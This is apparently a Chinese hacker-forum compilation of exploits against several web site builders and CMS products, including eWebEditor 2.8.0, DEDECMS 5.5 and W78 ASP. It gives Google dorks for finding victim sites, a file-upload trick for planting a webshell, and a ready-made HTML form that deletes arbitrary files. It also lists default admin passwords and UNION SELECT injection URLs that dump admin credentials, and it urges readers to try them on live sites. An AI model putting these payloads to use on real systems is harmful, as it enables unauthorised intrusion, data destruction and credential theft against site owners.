九天自助建站系统 0day
关键字:
inurl:/reg_TemletSel.asp?step=2
或者
电子商务自助建站–您理想的助手
利用方法:
1)注册
2)网站管理—资源管理—上传X.asp;x.jpg
3)拿到webshell
特殊情况:
1)强制改名
2)iis解析漏洞被修补,不能解析X.asp;x.jpg
Ewebeditor2.8.0最终版删除任意文件漏洞
来源:http://www.oldjun.com/blog/index.php/archives/40/
这个漏洞可以很鸡肋,也可以很致命,关键看你怎么利用!
此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入,看这些代码:
‘ 把带”|”的字符串转为数组
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, “|”)
‘ 删除新闻相关的文件,从文件夹中
Dim i
For i = 0 To UBound(aSavePathFileName)
‘ 按路径文件名删除文件
Call DoDelFile(aSavePathFileName(i))
Next
而aSavePathFileName是前面从数据库取出来的:
sSavePathFileName = oRs(“D_SavePathFileName”)
看看D_SavePathFileName是怎么添加到数据库里的,在addsave.asp(modifysave.asp)里:
sSavePathFileName = GetSafeStr(Request.Form(“d_savepathfilename”))
oRs(“D_SavePathFileName”) = sSavePathFileName
居然过滤了,是GetSafeStr函数,再看看这个函数,在Startup.asp里:
Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), “‘”, “”), Chr(34), “”), “;”, “”)
End Function
无语,这不是过滤字符型注入的函数么?放这里什么用也没有啊!既然路径没有过滤,那就可以直接定义了,构造一个提交页面,其中d_savepathfilename自己任意赋值(要删除多个文件,用|隔开即可)。试试../../eWebEditor.asp,提交后删除该新闻,于是主目录下的eWebEditor.asp不见了!
下面给出利用的htm:
- <HTML><HEAD><TITLE>eWebEditor删除文件 by:oldjun([url]http://www.oldjun.com[/url])</TITLE>
- <style>body,p,td,input {font-size:9pt}</style>
- </HEAD><BODY><a href=’list.asp’>新闻列表</a> | <a href=’add.asp’>增加新闻</a>
- <b>增加新闻</b>
- <form action=”http://127.0.0.1/editor/Example/NewsSystem/addsave.asp”
- method=”post” name=”myform”>
- <input type=hidden name=d_originalfilename>
- <input type=hidden name=d_savefilename>
- <table cellspacing=3 align=center>
- <tr><td>要删的文件(相对路径就可以了):</td>
- <td><input type=”text” name=”d_savepathfilename” value=”" size=”90″></td>
- </tr>
- <tr><td>新闻标题(随便填):</td>
- <td><input type=”text” name=”d_title” value=”" size=”90″></td>
- </tr>
- <tr><td>标题图片:</td>
- <td><select name=”d_picture” size=1><option value=”>无</option></select>
- 当编辑区有插入图片时,将自动填充此下拉框</td>
- </tr>
- <tr><td>新闻内容(随便填):</td>
- <td><textarea name=”d_content”></textarea></td>
- </tr>
- </table>
- <input type=submit name=btnSubmit value=” 提 交 “>
- <input type=reset name=btnReset value=” 重 填 “>
- </form>
- </BODY></HTML>
DEDECMS5.5暴路径漏洞
www.xxx.cn/plus/task/dede-upcache.php
在网站后面加上plus/task/dede-upcache.php
就能暴出网站路径但是没什么利用价值。
plus/paycenter/nps/config_pay_nps.php
plus/task/dede-optimize-table.php
plus/task/dede-maketimehtml.php
官方也存在这样的漏洞速度去暴暴
W78企业ASP网站管理系统V1.1的SQL注入
W78企业ASP网站管理系统V1.1的SQL注入
裸奔的系统。
1.shopmore.asp
set rs=server.createobject(“adodb.recordset”)
exec=”select * from [shop] where ssfl=”& request.QueryString(“id”) &” order by id desc ”
rs.open exec,conn,1,1
if rs.eof then
response.Write ” 该分类暂无产品!”
else
rs.PageSize =20 ‘每页记录条数
iCount=rs.RecordCount ‘记录总数
iPageSize=rs.PageSize
maxpage=rs.PageCount
page=request(“page”)
if Not IsNumeric(page) or page=”" then
page=1
2.about.asp
exec=”select * from [about] where id=”& request.QueryString(“id”)
set rs=server.createobject(“adodb.recordset”)
rs.open exec,conn,1,1
3.search_news.asp
dim title
title=request.form(“form_news”)
set rs=conn.execute(“select * from [news] where title like ‘%”&title&”%’”)
if title=”" then
response.write (“<script language=”"javascript”">alert(“”请输入关键字!”");history.go(-1);</script>”)
end if
if rs.eof then
response.write (“<script language=”"javascript”">alert(“”没有搜索到相关内容!”");history.go(-1);</script>”)
还有其他的页面。
4.此系统的在线编辑登录页面为admin/eWebEditor/admin/login.asp
默认user:admin password:198625
不能进的还可以试试
后台默认密码为admin11 86779533 abc123这三个
试试数据库默认地址为/data/%23sze7xiaohu.mdb
exp:http://www.xx.com/about.a … 0union%20select%201,admin,3,password,5,6%20from%20admin
http://www.xx.com/ShopMor … 0union%20select%201,2,admin%2bpassword,4,5,6,7,8,9%20from%20admin
搜索型注入:%’ and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where ‘%’=’
Google:inurl:ShopMore.asp?id